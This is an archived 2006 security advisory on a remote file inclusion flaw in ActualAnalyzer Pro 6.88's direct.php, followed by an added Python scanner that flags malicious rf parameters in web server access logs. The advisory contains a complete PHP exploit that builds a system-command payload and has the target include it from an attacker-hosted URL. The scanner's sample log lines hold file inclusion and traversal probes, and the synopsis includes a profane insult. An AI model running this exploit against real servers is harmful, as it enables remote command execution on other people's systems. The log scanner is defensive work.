
ActualAnalyzer688.txt

17 May 2006 00:00:00 | Reported by ReZEN | Type: packetstorm | Source: packetstormsecurity.com

ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability in Vendor ActualScripts' produc

Code
`=======================================================================================  
XOR Crew :: Security Advisory   
4/10/2006  
=======================================================================================  
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability  
=======================================================================================  
http://www.xorcrew.net/  
http://www.xorcrew.net/ReZEN  
=======================================================================================  
  
:: Summary  
  
Vendor : ActualScripts  
Vendor Site : http://www.actualscripts.com/  
Product(s) : ActualAnalyzer Pro v6.88  
Version(s) : All  
Severity : Medium/High  
Impact : Remote Command Execution  
Release Date : 4/10/2006  
Credits : ReZEN (rezen (a) xorcrew (.) net)  
  
=======================================================================================  
  
I. Description  
  
Pro Edition — the professional solution for medium and large business web sites.  
The ability to collect high detailed statistics about each separate page of web site  
will help you effectively manage the overall Internet strategy and direction of company,  
successfully optimize and develop him.  
  
=======================================================================================  
  
II. Synopsis  
  
FUCK YOU 'ASHTETICO' 0hday releasing wh0re.  
  
There is a remote file inclusion vulnerability that allows for remote command execution  
in the /direct.php file. The bug is here on lines 5-8:  
  
if(!isset($rf)) $rf='./';  
  
require $rf.'common/error.php';  
require $rf.'common/global.php';  
require $rf.'common/config.php';  
require $rf.'common/dbaccess.php';  
  
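The $rf variable is not initialized by the script before it is used in the require() calls,  
so a value supplied in the request (the rf= parameter shown in the exploit example below)  
becomes the include path prefix.  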
The vendor and support team have been contacted.  
  
=======================================================================================  
  
Exploit code:  
  
-----BEGIN-----  
  
<?php  
/*  
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN  
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K  
url: http://www.xorcrew.net/ReZEN  
  
example:  
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=  
hurl: http://www.pwn3d.com/evil.txt?  
  
*/  
  
$cmd = $_POST["cmd"];  
$turl = $_POST["turl"];  
$hurl = $_POST["hurl"];  
  
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"  
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"   
value=\"".$turl."\"><br>"  
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"   
value=\"".$hurl."\"><br>"  
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"   
value=\"".$cmd."\"><br>"  
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"  
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";  
  
if (!isset($_POST['submit']))  
{  
  
echo $form;  
  
}else{  
  
$file = fopen ("test.txt", "w+");  
  
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");  
system(\"echo ++END++\"); ?>");  
fclose($file);  
  
$file = fopen ($turl.$hurl, "r");  
if (!$file) {  
echo "<p>Unable to get output.\n";  
exit;  
}  
  
echo $form;  
  
while (!feof ($file)) {  
$line .= fgets ($file, 1024)."<br>";  
}  
$tpos1 = strpos($line, "++BEGIN++");  
$tpos2 = strpos($line, "++END++");  
$tpos1 = $tpos1+strlen("++BEGIN++");  
$tpos2 = $tpos2-$tpos1;  
$output = substr($line, $tpos1, $tpos2);  
echo $output;  
  
}  
?>  
  
  
------END------  
  
=======================================================================================  
  
IV. Greets :>  
  
All of xor, Infinity, stokhli, ajax, gml, D2K  
  
=======================================================================================  
  
`
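
For defenders reviewing web server logs on hosts that run this product, the following added example (not part of the advisory and not ActualScripts code) flags requests to `direct.php` whose `rf` parameter is anything other than the script's `./` default. It assumes combined-format access logs; the `/stats/` install path, the addresses and the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: ip, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# Any scheme or PHP stream wrapper prefix (http:, ftp:, php:, data:, ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)

def classify_rf(value):
    """Return a verdict for an rf value, or None for the script default './'."""
    v = unquote(value).strip()  # decode again so double-encoded probes are flagged
    if SCHEME_RE.match(v) or v.startswith(('//', '\\\\')):
        return 'url-or-wrapper'
    if '..' in v.replace('\\', '/').split('/'):
        return 'traversal'
    if v in ('', './'):
        return None
    return 'nonstandard-path'

def scan(lines, script='direct.php'):
    """Return (client_ip, status, verdict, decoded_rf) for each suspicious hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip quietly
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not unquote(parts.path).lower().endswith('/' + script):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.split('[')[0] != 'rf':  # PHP also accepts rf[...] array syntax
                continue
            verdict = classify_rf(value)
            if verdict:
                findings.append((ip, int(status), verdict, unquote(value)))
    return findings

# Constructed sample log lines (documentation address ranges, assumed /stats/ path)
SAMPLE_LOG = [
    '198.51.100.7 - - [17/May/2006:10:01:02 +0000] "GET /stats/direct.php?rf=http://203.0.113.9/x.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/May/2006:10:01:09 +0000] "GET /stats/direct.php?rf=hTTp%3A%2F%2F203.0.113.9%2Fx.txt%3F HTTP/1.1" 200 498',
    '192.0.2.44 - - [17/May/2006:10:03:00 +0000] "GET /stats/direct.php?rf=../../../tmp/ HTTP/1.1" 500 0',
    '192.0.2.50 - - [17/May/2006:10:04:00 +0000] "GET /stats/direct.php?rf=./ HTTP/1.1" 200 900',
    '192.0.2.50 - - [17/May/2006:10:05:00 +0000] "GET /stats/view.php?rf=http://203.0.113.9/ HTTP/1.1" 404 0',
]
if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An access log only records the query string: if the value reaches `$rf` through PHP's `register_globals` (an assumption, since the advisory does not name the mechanism), it can also arrive in a POST body or cookie, which this scan will not see.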
